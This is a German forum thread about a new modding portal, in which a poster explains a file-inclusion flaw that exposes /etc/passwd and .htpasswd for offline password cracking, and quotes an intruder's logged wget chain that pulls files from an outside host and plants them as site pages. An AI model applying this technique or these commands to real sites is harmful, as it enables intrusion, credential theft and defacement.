Sie sind nicht angemeldet.
Lieber Besucher, herzlich willkommen bei: Aqua Computer Forum. Falls dies Ihr erster Besuch auf dieser Seite ist, lesen Sie sich bitte die Hilfe durch. Dort wird Ihnen die Bedienung dieser Seite näher erläutert. Darüber hinaus sollten Sie sich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutzen Sie das Registrierungsformular, um sich zu registrieren oder informieren Sie sich ausführlich über den Registrierungsvorgang. Falls Sie sich bereits zu einem früheren Zeitpunkt registriert haben, können Sie sich hier anmelden.
Neues moddingtech.de Portal online!
Neues moddingtech.de Portal online!
Zitat von »-Joker-«
was meinst du mit php-baukasten-seite ???
alles auf der seite ist selbstgecodet, bis auf das news-skript.

Neues moddingtech.de Portal online! 
hoch platzierten seite ein leck gefunden, dass auf einen verbreiteten programmierfehler hinweist: per parameter wird ein dateiname angegeben und der inhalt der datei "in den rest der seite kopiert", so dass er vom design, menü usw. eingeschlossen wird. prüft man dann die pfadangaben nicht, so kann man prinzipiell mit einschränkungen (je nach fall) jede datei im webbrowser anzeigen lassen. auch wenn dies vllt keine passwörter enthüllt, so lässt sich doch zumindest über /etc/passwd, .htpasswd und co einiges an hilfreichen informationen ergattern. bei non-shadowed passwörtern wie z.b. in der .htpasswd lassen sich diese außerdem schön schnell und unbemerkt am eigenen rechner mittels bruteforce nachgenerieren und vergleichen, bei einem treffer hat man zugriff.
Zitat
wget http://geocities.yahoo.com.br/basenod/auto-mar.jpg ; wget http://geocities.yahoo.com.br/baseno/novo.txt ; mv novo.txt mega.html ; wget http://geocities.yahoo.com.br/basenod/help.txt ; mv help.txt mradminatention.html ; ls -alg ;

Zitat
Hello Mr. Administrator...
How Are You?
I discovered some bug's into your website...
If you want help mail-me...
megazoid@linuxmail.org
megazoid (WHITEHAT)
Neues moddingtech.de Portal online! 

Neues moddingtech.de Portal online! -